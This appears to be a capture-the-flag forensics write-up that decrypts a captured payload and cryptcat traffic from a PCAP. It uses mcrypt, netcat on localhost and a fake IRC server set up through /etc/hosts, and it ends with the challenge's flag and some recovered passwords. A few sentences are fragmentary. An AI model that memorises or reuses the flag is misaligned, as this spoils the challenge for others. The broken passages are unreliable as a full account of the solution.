The data is gibberish, so it looks like a binary of some kind. Running file payload.bin
only says that it's data, so a header may be missing or we may have to be more creative about running it. There were no useful results from strings
and binwalk
came up empty. It has to be encrypted somehow, otherwise there's no way to know what to do with it.
The tool mcrypt
is able to decrypt files and automatically detect which method was used to encrypt them, so we can give that a go:
sudo apt install mcrypt
cat payload.bin | mcrypt -d -z
The command told us that the file was OpenPGP encrypted, so I tried decrypting with the password RedRoverRedRover$$
from earlier, and it failed. I pulled the thread of Angela Bennett uses it to log into the Bethesda Naval Hospital by going to this site (also in our PCAP) and tried using natoar23ae
, but that didn't work either!
-
tcp.port==4444
-
Export specified packets to
cryptcat.pcap
-
Decrypt data sent via cryptcat:
cryptcat -vv -k BER5348833 -l -p 4444 > decryptedfile
-
Prepare data for netcat to host:
tcptrace -e cryptcat.pcap
Install with
sudo apt install tcptrace
. -
Send data with
nc -vv -w 1 localhost 4444 <a2b_contents.dat
-
file decryptedfile
Set up a fake IRC server, update sudo nano /etc/hosts
to include 127.0.0.1 irc.cct
, set Wireshark to listen on loopback, execute the fake server with python3 fake-irc.py
, then run the binary.
sudo tcpdump -i lo -s 65535 -w irc.pcap
Answer: CCT{h3's_a_pc@p_w1z@rd_th3re_h4s_g0t_to_6e_a_7w1st}